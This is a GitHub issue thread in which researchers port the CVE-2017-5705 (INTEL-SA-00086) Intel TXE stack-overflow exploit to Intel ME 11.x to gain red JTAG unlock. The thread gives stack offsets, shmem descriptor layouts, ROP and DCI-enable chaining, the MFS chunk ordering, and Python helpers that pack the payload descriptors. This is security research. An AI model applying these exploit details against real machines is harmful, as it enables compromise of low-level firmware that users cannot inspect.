Porting to ME - Githubissues

unix0825 commented 5 years ago

I am trying to port this POC to ME. The ME version I'm testing is 11.0.0.1202 (a vulnerable version according to the CVE-2017-5705 details). I made a ct file (a big one, to overflow the buffer and hang somewhere) and merged it into the original ME firmware using FIT. I also changed the OEM public key hash to 00 00..

The problem is that when I boot a laptop with the ct file merged, it boots normally without any failure. It looks like the ct file is not loaded at all during the boot process. Do I need some additional setting in FIT to make ME load the ct file?

kakaroto commented 5 years ago

I was just about to create a new issue asking for advice in porting to ME 11 and saw your issue, so I'm going to ask my question here. I'm targeting ME 11.0.0.1180 though, but it should be very similar.

@unix0825 yes, you are missing quite a lot of steps. I've been working on this for a long time, and you'll see what you're missing as I explain what I've done and how I can't get it to work yet. In your case, you probably can't use the FIT tool for that and you'd have to modify the MFS partition manually. I just tried with FIT and I get "[FitActions] Unable to load Token. File does not appear to be a valid/supported token", so I'm unsure how you got it to merge the file.

@h0t I've reversed pretty much the entire bup_init_trace_hub part, including the code that loads chunks from MFS, as well as part of bup_init_storage. I also wrote an MFS utility to manipulate MFS files so I can do what I need to do. I can get the crash, but I can't get the ROPs to work, and I'm not sure why or how to debug further than what I've done so far, and I've re-re-reviewed every offset and every code path that I can think of. The only possibility that I see is if bup_mfs_read_chunks is also using the syscall_context, but I've drilled down into it and I can't find anywhere where it accesses that context.

So here's what I've accomplished :

Found the CT data offset in the stack to be 0x384 on the ME instead of 0x380 in TXE.
Stack offset is 0x5D000 instead of 0x56000 (for ME 11.0.0.1180)
My target address (the memcpy return address) is at offset 0x984 from the stack (0x5C67C)
I set the syslib context address to be 0x90 bytes (0x68 + 0x28) before my syslib data in the ct file, and the data I have is <address to shmem descriptors><number of descriptors>. I haven't found anything else from syslib_ctx to be used other than the pointer at offset 0x90 and the count at 0x94.
On TXE, the shmem block index is 2, but it could be different on ME, so I've set all the shmem descriptors to contain the same data and I've created 20 of them just to be sure.
The shmem are 0x14 in size with data <0x11, TARGET_ADDRESS - 0x384, 0x384 + 0x40, 0, 0>. The last chunk that gets read from flash will be at offset 0x384 in my resulting CT file (which will then have size 0x384 + 0x40) and will contain the ROPs. I've tried shifting the data to different offsets, but it doesn't look like my target address is off. At least, not within + or - 0x20 bytes from what I calculated with static analysis.
I found the proper ROPs but for now for testing, I'm just doing the following two ROPs : <DCI_ENABLE, INFINITE_LOOP>. If the ROP gets executed, then it should call the DCI enable function and enter an infinite loop. I can't get the DCI to enable which tells me that the ROPs are not working (if I do enable DCI using the PCH strap, it does work so it's not a hardware setup issue). I've also tried having DCI enabled via strap and using the ROP to disable it, that doesn't work either (it stays enabled).
I've made sure the fitc.cfg : /home/mca/eom contains 0x00
I've made sure the home partition (iFile = 8) is not in MFS to prevent the alternate path in reading the file.
I made sure the /home/bup/ct file ends on a chunk boundary, so that the first 4 bytes appear at position 0x3C on a chunk, then the remaining 0x380 bytes are on their own chunks, then the additional 0x40 bytes containing the ROPs appear as a separate chunk that gets loaded after the 0x384 bytes of /bup/ct are loaded (== after syslib_ctx is overwritten).
I made sure the /bup/ct chunks do not appear in order, so the BUP module can't optimize by loading multiple chunks at the same time, which would defeat the purpose of having the read_chunk+memcpy happen after sysctx is overwritten.
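
The offsets in the list above can be cross-checked with a few lines of Python. This is only a sketch: the constants are the ones quoted for ME 11.0.0.1180, the names `flags`, `base` and `size` are hypothetical labels for the first three 32-bit words of the descriptor (the thread does not name them), and little-endian packing is assumed because the ME 11 core is x86.

```python
import struct

STACK_TOP = 0x5D000    # stack offset quoted for ME 11.0.0.1180
RET_OFFSET = 0x984     # distance of the memcpy return address from the stack top
CT_OFFSET = 0x384      # offset of the last chunk inside the resulting CT file
ROP_SIZE = 0x40        # size of the final chunk that carries the ROPs

# Address of the memcpy return address that the ROP chunk must land on.
TARGET_ADDRESS = STACK_TOP - RET_OFFSET


def shmem_descriptor(target: int) -> bytes:
    """Pack one 0x14-byte descriptor: <0x11, target - 0x384, 0x384 + 0x40, 0, 0>."""
    flags = 0x11                   # hypothetical field name
    base = target - CT_OFFSET      # hypothetical field name
    size = CT_OFFSET + ROP_SIZE    # hypothetical field name
    return struct.pack("<5I", flags, base, size, 0, 0)


# Twenty identical descriptors, so the shmem block index does not matter.
table = shmem_descriptor(TARGET_ADDRESS) * 20

print(hex(TARGET_ADDRESS))
print(len(table))
```

The computed target matches the 0x5C67C quoted above, and each descriptor comes out at 0x14 bytes, which at least confirms that the numbers in the list are consistent with each other.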

I checked the MFS partition manually in a hex editor to confirm the chunks' order being non sequential and that the ROPs appear on their own chunk, and confirmed that there is no crash if the /bup/ct filesize is less than 808 (and contains zeroes, it does crash trying to set the 0xB7/0xBF segments if I fill it with random data), so my MFS tool is working as it should. I also confirmed all of the correct offsets and contents for the TLS structure, the syslib context, the shmem descriptors and the ROPs.
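
The chunk layout described above can be planned before touching the MFS partition. A minimal sketch, assuming each chunk carries 0x40 bytes of file data (inferred from the 0x3C + 4 split mentioned in the list, not confirmed by the thread); `split_into_chunks` is a hypothetical helper and is not part of any MFS tool discussed here.

```python
CHUNK_DATA = 0x40  # assumed payload bytes per MFS chunk


def split_into_chunks(ct: bytes, first_offset: int = 0x3C) -> list:
    """Split ct so that its first piece starts at first_offset inside a chunk."""
    pieces = []
    pos = 0
    room = CHUNK_DATA - first_offset  # only 4 bytes fit in the first chunk
    while pos < len(ct):
        pieces.append(ct[pos:pos + room])
        pos += room
        room = CHUNK_DATA  # every later piece fills a whole chunk
    return pieces


# Placeholder payload: 0x384 bytes of overflow data followed by 0x40 bytes of ROPs.
ct = bytes(0x384) + b"\xAA" * 0x40
pieces = split_into_chunks(ct)

print(len(pieces), len(pieces[0]), len(pieces[-1]))
```

With these assumptions the last piece contains exactly the 0x40 bytes of ROPs, which is the property checked by hand in the hex editor.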

I don't know what I'm missing, so if you have any advice/hints to give, I'd appreciate it.

Thanks!

unix0825 commented 5 years ago

@kakaroto I was not using the unlock token in my experiment. I just wanted to make it crash and hang somewhere as a test, so I only used the ct file. In that situation I didn't get any error message in FIT. (I checked that if I merge both the ct file and some wrong unlock token with FIT, I get "[FitActions] Unable to load Token. File does not appear to be a valid/supported token", as you said.) In my experiment with only the ct file (no unlock token), I also used stack offset 0x5D000 and made some ROPs to hang somewhere (I also corrected all the offsets in the shellcode that I needed for ME 11.0.0.1202). The difference from your method is that I used syslib_tracer to escape the stack guard, similar to the TXE POC. But as I said, even the crash didn't happen (and of course my ct file is also bigger than 808 bytes). Do I need the unlock token to make ME load the ct file? If so, could you explain how to make it?

Thank you, as always!

kakaroto commented 5 years ago

@unix0825 ah, it was in Flash Layout, my bad. I confused it with the unlock token. I tried it, then checked the ct file it added, and it has the right size, so it should work. I was just about to say that you can't use the syslib_tracer because ME 11 doesn't use it in bup_init_trace_hub, which is why I tried to reproduce the exploit with the memcpy. But before I replied, I decided to check a newer ME (11.6.0.1126), and it does indeed use syslib_tracer, so I wouldn't need to mess with the memcpy. I went back and checked your version, 11.0.0.1202, and it also uses the syslib_tracer; only 11.0.0.1180 didn't... I was really unlucky to have started with the version that didn't, and I thought the syslib_tracer code was only used in TXE, not ME 11 🤦‍♂.

That should make a lot of this much easier! Thanks for your help! Hopefully that unlocks where I've been stuck and I can help you back (if PT team doesn't respond by then). Once I have JTAG, I should be able to figure out why the memcpy method wasn't working.

For your issue with it not crashing, check if the motherboard doesn't have two BIOS chips. I've had that before on a machine when I was testing, as it crashes during load, the MB will automatically switch to the "known working" BIOS image instead. So after it boots, try to dump the flash, see if it restored to a different version or if the file hash still matches. Also try flashing it completely with random data (or just erase it) to see if the PC still boots from a different image.
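
The dump-and-compare check suggested above is easy to script. A minimal sketch, assuming you already have the image you flashed and a fresh dump as two files; the helper names and file names are hypothetical.

```python
import hashlib
from pathlib import Path


def sha256_of(path) -> str:
    """Return the SHA-256 hex digest of a file's contents."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def image_was_replaced(flashed_path, dumped_path) -> bool:
    """True if the dump taken after boot differs from the image that was flashed."""
    return sha256_of(flashed_path) != sha256_of(dumped_path)
```

For example, `image_was_replaced("modified.bin", "dump_after_boot.bin")` returning True would suggest that something rewrote the flash. Firmware may legitimately update parts of the flash during boot, so a mismatch alone is only a hint; comparing just the ME region is a stricter check.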

Thanks!

h0t commented 5 years ago

Hi @unix0825 and @kakaroto

Do I need the unlock token to make ME load ct file?

No, you don't need the unlock token on ME11 (not TXE).

For your issue with it not crashing, check if the motherboard doesn't have two BIOS chips.

On the Gigabyte mainboard I had to turn off DUAL-BIOS, because the watchdog constantly reboots the system.

markel777 commented 5 years ago

Hi @kakaroto

That should make a lot of this much easier!

Please be aware that the arbitrary-write method leveraging syslib_tracer_ctx, which we used in TXE, lets you control only four bits of the value written to the controlled address. We used that to change the return address from bup_update_sys_tracer. However, being able to change only four bits of the original return address, we found, with great difficulty, only one ROP gadget that we could call and that also moves the stack pointer to a controlled area (we control only part of the bup_init_trace_hub stack frame). Whether the same or a similar ROP gadget exists in an ME firmware (the one you use or another one vulnerable to the stack overflow) is a very good question.
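
To see how tight that constraint is, one can enumerate every return address reachable by changing four bits and intersect the result with a list of known gadgets. This is an illustrative sketch only: the thread does not say which four bits are controllable, so the bit positions are a parameter, and the function names are made up for this example.

```python
from itertools import product


def reachable_addresses(ret_addr: int, bit_positions: tuple) -> set:
    """All values obtainable by freely choosing the bits listed in bit_positions."""
    cleared = ret_addr
    for bit in bit_positions:
        cleared &= ~(1 << bit)  # zero every controllable bit first
    out = set()
    for choice in product((0, 1), repeat=len(bit_positions)):
        value = cleared
        for bit, on in zip(bit_positions, choice):
            value |= on << bit
        out.add(value)
    return out


def usable_gadgets(ret_addr: int, bit_positions: tuple, gadgets) -> list:
    """Gadget addresses that can be reached from ret_addr under the bit constraint."""
    return sorted(reachable_addresses(ret_addr, bit_positions) & set(gadgets))
```

Four controllable bits give at most 16 candidate addresses, one of which is the original return address, so finding even one stack-pivoting gadget among them is a matter of luck for a given firmware build.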

kakaroto commented 5 years ago

Hi @markel777 Looks like I wrote the below comment 2 weeks ago (right after my previous comment) and just found it unsubmitted in one of my chrome tabs.

=====

Turns out I was an idiot: the ME version whose offsets/values I had checked 10 times was a different version from the one I was testing on hardware, all because of a typo I made in the file I first loaded into IDA a few months ago. While trying to switch to a newer ME version to try the systracer method as suggested here, I realized my mistake!

Anyways, looks like my ROPs are working now (using the memcpy method, not systracer), and I can set red unlock.. now to figure out what to change in OpenIPC's XML files for it to see the ME core and its devices. I expected an "unknown id code on chain" but it doesn't seem to say that, so it probably won't work until I add it to the xml.

I tried using DAL and added the xml snippet provided in the slides from CCC, but it didn't work. I can see in a screenshot that you had the PARCSMEA under RNGTOP, but as you can see in the screenshot, I have RNGLIB but no RNGTOP. This is on a skylake device, 100 series PCH-LP and it seems RNGTOP is only for PCH-H. I'll try a newer DAL to see if it makes any difference, otherwise I'll dig into the openIPC xml files to understand them.

Thanks for the help!

======

So, yes, I know how the syslib_tracer_ctx works and the 4 bits it can modify and I was also worried if I could find a proper ROP with that. But as soon as I realized my mistake in using the wrong file and fixed the offsets to match the version I was testing with, the memcpy exploit worked as expected, so that's not an issue anymore.

My main concern now is to make the ME core appear in OpenIPC. I've fiddled a bit with the XML files. I think I understand most of how they work, but since SKL/KBL doesn't give us any of the topology, it's unable to find the device. I added the LMT2 device but it doesn't work; I still need to do some more tests. I tried using CoreGroup CSME and DeviceType SPT_CSME_LMT, but it didn't help. I then tried setting it to LMT2 and it did show up as LMT2 once, but I couldn't reproduce it afterwards, and even though it appeared as an LMT2 device, I believe the .idcode() call on the device returned 0.

I'm still at the stage where I'm exploring how to make OpenIPC XML work the way I want it to and I'm trying to find a way to tell JTAG to give me the entire chain topology and idcodes but I can't seem to be able to do that. So there's definitely some progress.

peterbjornx commented 5 years ago

For me the memcpy mode of attack did require quite some tweaking, in my case I could only get it working by fragmenting the ct file as having it be contiguous in flash meant that the entire file would be read at once: no second call to mg_copyto. Does it also do that on real hardware? I was testing against an emulated SPT firmware. As to OpenIPC, I pretty quickly decided to drop those experiments as DAL already has support for the platform at least.

peterbjornx commented 5 years ago

Never mind, I did not see your earlier message about chunk order. Glad to see that my findings on the emulator match real world results :). Also, how did you get FIT to leave eom clear? I never managed to get it to do that and had to rebuild my image with my own tool to do so.

kakaroto commented 5 years ago

I never tried (or thought I could try) emulating the ME. I only saw in the asm code that it would optimize the reads and read up to 10 chunks at the same time if they were contiguous, so I made it add the ct file in reverse order. I didn't test without it but I'd expect it wouldn't have worked otherwise. I tried DAL as well but it didn't seem to work either (couldn't see the LMT2 in the hardware list in ConfigConsole). I haven't used DAL at all other than running the ConfigConsole for testing early on, but if it works with that, I might need to switch. Thanks!
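
The effect of the chunk order on the number of reads can be modelled in a few lines. This is a toy model based only on the description above (contiguous chunks are batched, up to 10 per read); it is not a reimplementation of the BUP code, and the chunk indices are made up.

```python
MAX_RUN = 10  # the thread reports up to 10 contiguous chunks being read at once


def group_reads(chunk_indices):
    """Group physical chunk indices (given in file order) into batched reads."""
    reads = []
    for idx in chunk_indices:
        last = reads[-1] if reads else None
        if last and idx == last[-1] + 1 and len(last) < MAX_RUN:
            last.append(idx)      # extends the current contiguous run
        else:
            reads.append([idx])   # starts a new read
    return reads


in_order = list(range(100, 116))   # 16 chunks stored contiguously
reversed_order = in_order[::-1]    # same chunks stored in reverse

print(len(group_reads(in_order)))
print(len(group_reads(reversed_order)))
```

In this model the contiguous layout collapses into two reads, while the reversed layout forces one read per chunk, so the chunk carrying the ROPs is copied in a separate step after the earlier chunks.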

As for FIT, I didn't use it at all. I wrote my own MFS utility, but the image I had already had a clear eom file, so it wasn't even an issue.

unix0825 commented 5 years ago

Hi @markel777, @h0t and @kakaroto

Please be aware that the arbitrary-write method leveraging syslib_tracer_ctx, which we used in TXE, lets you control only four bits of the value written to the controlled address. We used that to change the return address from bup_update_sys_tracer. However, being able to change only four bits of the original return address, we found, with great difficulty, only one ROP gadget that we could call and that also moves the stack pointer to a controlled area (we control only part of the bup_init_trace_hub stack frame). Whether the same or a similar ROP gadget exists in an ME firmware (the one you use or another one vulnerable to the stack overflow) is a very good question.

Yes. I think I found ROP gadgets in ME that allow moving the stack pointer to a controlled area, so I'm using bup_update_sys_tracer like the TXE POC. But I still have the problem that the system is not crashing with my ct_file (shellcode).

For your issue with it not crashing, check if the motherboard doesn't have two BIOS chips. I've had that before on a machine when I was testing, as it crashes during load, the MB will automatically switch to the "known working" BIOS image instead. So after it boots, try to dump the flash, see if it restored to a different version or if the file hash still matches. Also try flashing it completely with random data (or just erase it) to see if the PC still boots from a different image.

I checked whether my laptop has two BIOS chips, but I can find only one. I'm using FIT (Flash Layout -> Intel ME Region -> Intel Trace Hub Binary) to merge my ct_file to crash the system. I did not get any problems or error messages building the image with the ct_file in FIT. But the system still boots fine and does not crash. It should not boot properly even if the offset calculation in my ct_file were wrong, because the ct_file is bigger than 808 bytes. After it booted, I also dumped the flash again to check whether my ct_file had somehow been replaced by the original ct_file, but the dump still had my ct_file unchanged. So it should work, I think. So my question is: was it wrong to merge the ct_file with FIT for ME?

kakaroto commented 4 years ago

Good news, I finally got it! Unfortunately there wasn't a way to scan or probe for devices, so I had to generate an XML with all possible device paths in the JTAG chain, clear out those with an invalid idcode, and then do an irdrscan 0x2 on the valid TAP devices until I found the processor id of the LMT device. In the end, it works :) Thanks for all the help I got from here!

After I'm done with the rest of my ROPs to get the main CPU booting, I'll release everything with a blog post on the whole process. In the meantime, you get to see the important offsets in that screenshot for those who need them :)
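
The "clear out those with an invalid idcode" step can be sketched without any JTAG tooling. The sketch assumes the idcodes have already been read (for example through OpenIPC) into a plain dict, and it relies only on generic IEEE 1149.1 properties: an IDCODE is 32 bits with bit 0 set, and all-zeros or all-ones usually means nothing answered. The device paths and the non-trivial idcode value are made up.

```python
def is_plausible_idcode(value: int) -> bool:
    """Reject all-zeros, all-ones and values whose mandatory bit 0 is clear."""
    return value not in (0x00000000, 0xFFFFFFFF) and (value & 1) == 1


def keep_valid(scan_results: dict) -> dict:
    """Keep only the device paths whose idcode looks like a real TAP."""
    return {path: idc for path, idc in scan_results.items()
            if is_plausible_idcode(idc)}


# Hypothetical scan results: device path -> idcode read from that path.
scan = {
    "hypothetical/path/0": 0x00000000,
    "hypothetical/path/1": 0x12345013,
    "hypothetical/path/2": 0xFFFFFFFF,
}

print(sorted(keep_valid(scan)))
```

The surviving paths are the ones worth probing further with the irdrscan step described above.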

h0t commented 4 years ago

Hi @kakaroto, congratulations! Good job!

unix0825 commented 4 years ago

Hi @kakaroto, congratulations!! I'm really looking forward to your blog!!

kakaroto commented 4 years ago

Thanks! It didn't take long to get the main CPU to boot.

I do see some weird behavior though. Once I boot the machine, it works fine (I can log into Ubuntu), but OpenIPC doesn't let me halt the CSE thread anymore, with the error "Timeout occurred while waiting for threads to halt with 0 retries" (this is when booting the machine after I launched ipccli). If I do an ipc.forcereconfig(), I instead get "Path 'tap.tapstatus.pm_in_progress' does not correspond to a valid state node on device 0x00001001", and if I stop my python process and try again, I get "Unable to perform operation, because OpenRC does not support core group GPC". Rebooting the machine doesn't work: the exploit doesn't even seem to happen anymore (scanning the aggregator personality register gives 0) and the machine doesn't boot. At least that's fixed by enabling the HAP bit. Another side effect of enabling HAP: now I can halt the CSE thread after the machine boots (as long as I open OpenIPC before booting the machine and don't call ipc.forcereconfig()). Either way, now that I have JTAG working with the CPU booted, I just need to figure out the XML config to get JTAG to work for both the main CPU and the ME core at the same time :)

P.S: I also got it working on a Z270 kabylake system with ME 11.6.

kakaroto commented 4 years ago

I have released my findings and port to ME 11.x which you can read here : https://kakaroto.homelinux.net/2019/11/exploiting-intels-management-engine-part-2-enabling-red-jtag-unlock-on-intel-me-11-x-intel-sa-00086/

I believe this issue can be closed now.

unix0825 commented 4 years ago

Oh. That is great work!

Now I can figure out what my problem was.

Thank you so much!

On Thu, Nov 14, 2019 at 6:54 PM, Youness Alaoui notifications@github.com wrote:

I have released my findings and port to ME 11.x which you can read here : https://kakaroto.homelinux.net/2019/11/exploiting-intels-management-engine-part-2-enabling-red-jtag-unlock-on-intel-me-11-x-intel-sa-00086/

I believe this issue can be closed now.


ptresearch / IntelTXE-PoC

Porting to ME #17